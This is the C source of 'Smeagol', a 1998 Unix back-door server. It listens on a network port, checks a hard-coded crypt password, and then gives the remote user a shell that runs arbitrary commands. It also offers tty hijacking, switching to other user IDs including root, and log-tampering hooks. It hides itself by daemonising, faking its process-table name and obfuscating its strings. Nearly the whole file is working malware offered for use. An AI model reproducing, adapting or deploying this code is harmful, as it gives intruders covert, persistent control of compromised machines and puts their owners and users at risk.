/*
** Smeagol:	a Back-Door-Server
**
** Author:	TICK (t_i_c_k@hotmail.com)
**
** Usage:	smeagol [-m <maskas user>] [-p <alternative port>] [-d <debug>]
**                [-c]
**                 ^--- run Smeagol w/ diffrent UIDs
**                      never change to locked entries and system UIDs
**
** Last Update:	1998/03/12
**
** Tested on: Linux 1.1.59
**            Linux 2.0.33
**            AIX 4.X     (no UID changing possible)
**
******************************************************************************/

#include <pwd.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
extern int errno;
#include "smeagol.h"
#include "cmds.h"
#include "auth.h"
#include "error.h"
#include "strhide.h"

#define write2sock(str)	writen(transfer_socket, str, strlen(str))


/*
	Globals
*/


u_int                 Debug       = 0;
u_int                 Change      = 0;
u_int                 Maskas      = 0;
volatile sig_atomic_t Timeout     = 0;
volatile sig_atomic_t Trigger     = 0;
int                   connect_socket;
extern int            transfer_socket;
extern char           **environ;
char                  *PrgName;

/* "import" variables of cmds.c */
u_int     cmd_id;
char      param[81];
char      dir[81];


static void vSigAlarm(int signr);
static void vTrigger(int signr);
void        vChangeArgv(void);
int         iCmdExec(char *);
int         iDaemonSpell( void );
int         iMainLoop(void);
int         iCheckPass(char *, char *);
int         iInstallSigHdlr(void (*fkt_ptr) (int));
int         iMaskAs(char *);
int         ttyhijack(char *);
#ifdef ACCTH
int         accthndlr(void);
#endif
void        vCloseCon(char *);
void        vClearArg(char *);
void        vBanner(int);


/*--------------------------------------------------------------------------

                          M A I N   F U N C T I O N

----------------------------------------------------------------------------*/		

int main(int argc, char **argv)
{
  int	c, i;
  char	Buf[9];
  
  Me = argv[0];
  if(!Auth(NULL , 2, EraseMe))
    exit(1);        

  opterr = 0;
  while( (c = getopt(argc, argv, "cm:p:d")) != EOF)
  {
    switch(c)
    {
      case 'c':
        Change++;
        break;
      case 'm':
        strncpy(Buf, optarg, 8);
        if( (i = iMaskAs(Buf)) == -1)
          err_mesg(FATAL, "\n%s %s\n", SHD("1%3X_=B5Q.C\\^)G$$(C0C:W$`"), Buf);
        else if(i == -2)
          err_mesg(FATAL, "\n%s\n", SHD("8&'$U/C]V)7$Y,\"<T<2,^/B5Q(2,X)W\\B"));
        Maskas++;
        break;
      case 'd': /* debug */
        Debug = 1;
        break;
      case 'p':
        PORT = (u_int) atoi((const char*) optarg);
        break;
      case '?':
        err_mesg(WARN, "\nunrecognized option: -%c\n\n", optopt);
        break;
    }
  }

  if(!Debug)  /* no debugging */
    iDaemonSpell();

  /* let's fake the ps table */
  PrgName = argv[0];
  while(argc)
    vClearArg(argv[--argc]);
  
  alarm(0);
  (void) iInstallSigHdlr(vTrigger);
  vChangeArgv();
  /* done */

  exit(iMainLoop());
}



/*---------------------------------------------------------------------------
                        S U B   F U N C T I O N S
-----------------------------------------------------------------------------*/			

static void vTrigger(int signr)
{
  Trigger = 1;
  return;
}

static void vSigAlarm(int signr)
{
	Timeout = 1;
	return;
}

void vChangeArgv(void)
{
  static u_int current_argv = MAXARG0;
  struct passwd *pwd;
  
  
  /* first change prog.name */
  (current_argv+1 >= MAXARG0) ? (current_argv = 0) : current_argv++;
  vClearArg(PrgName);
  strcpy(PrgName, SHD(cArgvs[current_argv]));
  
  /* change UID */
  while(Change)
  {
    if( (pwd = getpwent()) == NULL )
    {
      setpwent();
      continue;
    }
    
    if( pwd->pw_passwd[0] == LOCKED || (pwd->pw_uid < MINUID))
      continue;
      
    if(iMaskAs(pwd->pw_name) >= 0)
      break;
  }
  
  if( fork() > 0)
    exit(0);  
  
  return;
}

int iDaemonSpell(void)
{
	pid_t pid;
  int   fd;
  
	if( (pid = fork()) < 0)
		return(-1);
	else if(pid != 0)
		exit(0);

  if( (fd = open("/dev/tty", O_RDWR) ) >= 0)
  {
    ioctl(fd, TIOCNOTTY, (char *) 0);       /* lose controlling terminal */
    close(fd);
  }    
	
	chdir("/");	/* change working direc. */
	umask(0);	/* delete filecreatingmask */
  
	return(0);
}

void vCloseCon(char *Bye)
{
	write2sock(Bye);
	write2sock("\n\n");
	close(transfer_socket);
}

int iMainLoop(void)
{
  char  Buffer[4096];
  char  Prompt[512];
  char  User[9];
  int   client_addr_len;
  int   n, result;
  int   iExit;
  pid_t pid, cpid;
  struct sockaddr_in	client_addr;
  struct sockaddr_in	sock_info;
  

  sprintf(Prompt, "\033[1;34m[/] %s\033[0m", SHD(CMDPRMT));
  
  if((connect_socket = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    if(Debug)
      err_mesg(FATAL_SYS, "SYSERR");
    exit(2);
  }
    
  sock_info.sin_port = htons((u_short) PORT);
  sock_info.sin_addr.s_addr = INADDR_ANY;
        
  if(bind(connect_socket, (struct sockaddr*) &sock_info, sizeof(sock_info))  == -1)
  {
    if(Debug)
      err_mesg(WARN_SYS, "\n%s\nSYSERR", SHD("K%P02&G!Q!CDP)78B<24Y,\"5]<1AQ,C`_=B5Q,B,T,\"4T<3!Q(CXR.C0E<```"));
    exit(2);
  }

  if( listen(connect_socket, 5) == -1)
  {
    if(Debug)
      err_mesg(WARN_SYS, "\nERROR: listen()\nSYSERR");
    exit(3);
  }

  alarm(INVAL);
  while(1)
  {
    errno = Trigger = 0;
    if( (transfer_socket = accept(connect_socket, (struct sockaddr*) &client_addr, &client_addr_len)) == -1)
    {
      if(errno == EINTR && Trigger)
      {
        vChangeArgv();
        alarm(INVAL);
      }
      if(Debug)
        err_mesg(WARN_SYS, "\nSYSERR");
      continue;
    }

    
    /* REQUEST */
    if( write2sock(PWDPRMT) == -1)
    {
      if(Debug)
        err_mesg(WARN_SYS, "\nERROR: write()\n\n");
      exit(5);
    }

    alarm(0);
    (void) iInstallSigHdlr(vSigAlarm);
    alarm(BLOCK);
    Timeout = 0;
    if( (n = readline(transfer_socket, Buffer, sizeof(Buffer))) == -1)
    {
      alarm(0);
      (void) iInstallSigHdlr(vTrigger);
      vChangeArgv();
      alarm(INVAL);

      if(Timeout)
      {
        if(Debug)
          err_mesg(WARN, "\nTimeout\n\n");
      }
      else if(Debug)
        err_mesg(WARN, "\nERROR: readline()\n\n");
      
      close(transfer_socket);
      continue;
    }
    alarm(0);
    (void) iInstallSigHdlr(vTrigger);
    vChangeArgv();
    alarm(INVAL);
    
    if(Buffer[n-1] == '\n')
    	Buffer[n-2] = 0;

    if(iCheckPass(Buffer, PASSWORD))
    {
      close(transfer_socket);
      continue;
    }
    /* erase the pass phrase from memory */
    memset(Buffer, 0, sizeof(Buffer));
    
    vBanner(transfer_socket);
    
    if( (pid = fork()) == -1)
    {
      vCloseCon("\nOoh my luvley master, I can't help you.\n");
      continue;
    }
    else if(pid == 0)
    {
      /* we don't need this socket */
      close(connect_socket);

      if( (cpid = fork()) == -1)
      {
        vCloseCon("\nI can't help you.\n");
        continue;
      }
      if(cpid != 0)
      	exit(0);
      else if(cpid == 0)
      {
        if(Change || Maskas)
          iMaskAs("root");
        vClearArg(PrgName);
        strcpy(PrgName, SHD(SESSIONMASK));
 
      	while(1)
        {
          write2sock(Prompt);
          if( (n = readline(transfer_socket, Buffer, sizeof(Buffer)-2)) == -1)
            continue;
	
          if(Buffer[n-1] == '\n')
            Buffer[n-2] = 0;
			
          if( (result = iIsCmd(Buffer)) == 0)		
            iCmdExec(Buffer);
          else if(result == -1)
            write2sock("Parameters are missing.\n");
          else if(result == 1)
            switch(cmd_id)
            {
              case CMD_ACCTH:
              #ifdef ACCTH
                accthndlr();
              #else
                write2sock("\t\t\t");
                write2sock(SHD("<$#(R)7$9,#\\U/3@_-G$_/B5Q,\"<P.#TP,STT?P``"));
                write2sock("\n");
              #endif
                break;
                
              case CMD_TTYHIJ:
                ttyhijack(param);
                break;
          
              case CMD_MASKAS:
                strncpy(User, param, 8);
                if( (iExit = iMaskAs(User)) == -1)
                {
                  sprintf(Buffer, "Don't know User: %s\n", User);
                  write2sock(Buffer);
                }
                else if(iExit == -2)
                  write2sock(SHD("C&30H<3(Y)#P\\-\"-]<3AQ.3`G-#]V)7$C/CXE<2$C.\"=_(G``"));
                  write2sock("\n");
                break;

              case CMD_BYE:
                vCloseCon("Bye\n");
                exit(0);
					
              case CMD_HELP:
                vHelp();
                break;
					
              case CMD_CD:
                if(!iChgDir(param))
                  sprintf(Prompt, "\033[1;34m[%s] %s\033[0m", dir, SHD(CMDPRMT));
                break;
									
              case CMD_REMOVE:
                strncpy(User, param, 8);
                removeit(User);
                break;
            }
        }
      }    
    }
    else if(pid != 0)
    {
      waitpid(pid, NULL, 0);
      close(transfer_socket);
    }
	}
}

int iInstallSigHdlr(void (*fkt_ptr) (int))
{
  struct sigaction sig_act;

  sig_act.sa_handler = fkt_ptr;
  sigemptyset(&sig_act.sa_mask);
  sig_act.sa_flags = 0;

  #ifdef SA_INTERRUPT   /* Solaris */
    sig_act.sa_flags |= SA_INTERRUPT;  /* don't restart read()-call */
  #endif

  if(sigaction(SIGALRM, &sig_act, NULL) < 0)
  {
    perror("ERROR");
    exit(-1);
  }

  return(0);
}

void vClearArg(char *Arg)
{
	char *cTmpStr = Arg;
   
	while(*Arg != '\0')
		*Arg++ = ' ';
		
	*cTmpStr = '\0';
}

int iCmdExec(char *cCmd)
{
	pid_t pid;
	int   iStatus;
	char  cBuf[4096];
	
	if((pid = fork()) < 0)
	{
		vCloseCon("\nI can't help you.\n");
		return(-1);
	}
	
	if(pid == 0)
	{
		/* redirect the stdin, stdout and stderr to the file-table-
		   entry of transfer_socket */
		dup2(transfer_socket, 0);
		dup2(transfer_socket, 1);
		dup2(transfer_socket, 2);
		close(transfer_socket);

    /* put the command into the environment */
    sprintf(cBuf, "EDIT=%s", cCmd);
    putenv(cBuf);

		/* exec the fuqin shell */
		execl(SHELL, SHD(SHELLMASK), "-c", "$EDIT", NULL);
		/* Yeah sure, this kind of exec() call isn't very secure -
		   like system() - but it allows more felxibility for command
		   execution.
		*/
		
		return(-1); /* Can't exec. shell */
	}
	else if(pid != 0)
	{
		waitpid(pid, &iStatus, 0);
		return(WEXITSTATUS(iStatus));
	}
}

void vBanner(int iFd)
{
	int	iCtr;
	
	/* clear the screen */
	for(iCtr = 0; iCtr < 25; iCtr++)
		write(iFd, "\n", 1);

  write2sock("\033[1;5;31m");		
  write2sock("#     # ####### #        #####  ####### #     # #######\n");
  write2sock("#  #  # #       #       #     # #     # ##   ## #      \n");
  write2sock("#  #  # #       #       #       #     # # # # # #      \n");
  write2sock("#  #  # #####   #       #       #     # #  #  # #####  \n");
  write2sock("#  #  # #       #       #       #     # #     # #      \n");
  write2sock("#  #  # #       #       #     # #     # #     # #      \n");
  write2sock(" ## ##  ####### #######  #####  ####### #     # #######\n\n");
  write2sock("\033[0m");
  write2sock("\033[1;35m");
  write2sock(" #####                                                                         \n");
  write2sock("#     #   #   #  #####   ######  #####    ####   #####     ##    #    #  #    #\n");
  write2sock("#          # #   #    #  #       #    #  #       #    #   #  #   #    #  ##   #\n");
  write2sock("#           #    #####   #####   #    #   ####   #    #  #    #  #    #  # #  #\n");
  write2sock("#           #    #    #  #       #####        #  #####   ######  # ## #  #  # #\n");
  write2sock("#     #     #    #    #  #       #   #   #    #  #       #    #  ##  ##  #   ##\n");
  write2sock(" #####      #    #####   ######  #    #   ####   #       #    #  #    #  #    #\n\n");
  write2sock("\033[0m");
       
}   


int iCheckPass(char *cPlain, char *cEnc)
{
  char    cKey[8];
  char    cSalt[3];
  char    *cResult;

  /* we only need the first 8 byte of the entered password */
  strncpy(cKey, cPlain, 8);

  /* now, let's get the salt from the encrypted password */
  strncpy(cSalt, cEnc, 2);

  /* here we go */
  cResult = (char *) crypt(cKey, cSalt);

  return(strcmp(cEnc, cResult));
}

